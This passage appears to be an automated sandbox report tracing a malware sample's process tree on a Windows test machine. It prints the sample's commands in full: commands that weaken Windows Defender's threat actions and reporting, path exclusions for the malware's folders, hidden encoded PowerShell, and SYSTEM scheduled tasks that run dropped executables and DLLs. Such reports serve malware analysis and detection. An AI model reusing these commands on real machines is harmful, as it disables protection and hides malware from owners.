  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
  - Drops file in Drivers directory
  - Adds Run key to start application
  - Drops file in Program Files directory
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
- [3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\DOWaNXZtDJLiC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\EHjpVGHxoTMU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RQzLvVUNU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nVgZiWyyyxUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\NKsRZGTfNWtvCUVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\mlmrxyCihFugMjhe\" /t REG_DWORD /d 0 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [4] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:32
- [5] C:\Windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DOWaNXZtDJLiC" /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EHjpVGHxoTMU2" /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RQzLvVUNU" /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR" /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVgZiWyyyxUn" /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\NKsRZGTfNWtvCUVB /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn /t REG_DWORD /d 0 /reg:64
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\mlmrxyCihFugMjhe /t REG_DWORD /d 0 /reg:64
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gOWWqevQB" /SC once /ST 02:12:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  - Creates scheduled task(s)
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Loads dropped DLL
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gOWWqevQB"
  - Suspicious use of SetThreadContext
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gOWWqevQB"
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "YqJChhYnTMHzkMjCc" /SC once /ST 04:23:58 /RU "SYSTEM" /TR "\"C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exe\" lA /site_id 394347 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "YqJChhYnTMHzkMjCc"
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- [3] C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
- [2] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  - Suspicious use of SetThreadContext
- [3] C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
- [4] C:\Windows\SysWOW64\schtasks.exe
  /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
  - Creates scheduled task(s)
- [2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
- [3] C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
- [2] C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exe
  C:\Windows\Temp\mlmrxyCihFugMjhe\GODdmYHTnpCwNhO\bXhtqdI.exe lA /site_id 394347 /S
  - Checks computer location settings
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Modifies data under HKEY_USERS
- [3] C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
  - Drops file in Windows directory
  - Modifies Internet Explorer settings
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  - Blocklisted process makes network request
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
- [4] C:\Windows\SysWOW64\forfiles.exe
  forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
- [5] C:\Windows\SysWOW64\cmd.exe
  /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [6] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
  - Modifies data under HKEY_USERS
- [7] C:\Windows\SysWOW64\Wbem\WMIC.exe
  "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bvmcjEjDUxHOOxIZsK"
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
- [4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
- [3] C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  - Blocklisted process makes network request
  - Executes dropped EXE
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [4] C:\Windows\SysWOW64\reg.exe
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\RQzLvVUNU\uyXldN.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RulYNORIEfYpYdh" /V1 /F
  - Checks for any installed AV software in registry
  - Drops file in Windows directory
  - Creates scheduled task(s)
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "RulYNORIEfYpYdh2" /F /xml "C:\Program Files (x86)\RQzLvVUNU\sbxBRSn.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RulYNORIEfYpYdh"
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RulYNORIEfYpYdh"
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "sQKEyxOvETjkhD" /F /xml "C:\Program Files (x86)\EHjpVGHxoTMU2\ttcxnvA.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LUNOxqyZdvVpf2" /F /xml "C:\ProgramData\NKsRZGTfNWtvCUVB\oqJEsDV.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- [4] C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "cXKEjEvxPbALHdiUE2" /F /xml "C:\Program Files (x86)\ZEsFaEtipdnTXqXtwBR\PvPZJEr.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "eoTgVxzVyVjpEcHcuxi2" /F /xml "C:\Program Files (x86)\DOWaNXZtDJLiC\eHWQFjn.xml" /RU "SYSTEM"
  - Creates scheduled task(s)
- [3] C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "TzpzstmaipgnuWYOU" /SC once /ST 16:01:46 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll\",#1 /site_id 394347" /V1 /F
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "TzpzstmaipgnuWYOU"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "spuTWhHjihUt" /SC once /ST 14:50:57 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exe\" vm /S"3⤵
- Blocklisted process makes network request
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "spuTWhHjihUt"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "spuTWhHjihUt"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "spuTWhHjihUt"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YqJChhYnTMHzkMjCc"3⤵
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll",#1 /site_id 3943472⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\mlmrxyCihFugMjhe\hamLORxc\dumnGEw.dll",#1 /site_id 3943473⤵
- Checks BIOS information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "TzpzstmaipgnuWYOU"4⤵
-
C:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exeC:\Users\Admin\AppData\Local\Temp\prNnatYmCsQFEeCzn\ZngWjrav\Igfukue.exe vm /S2⤵
- Modifies Internet Explorer settings
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
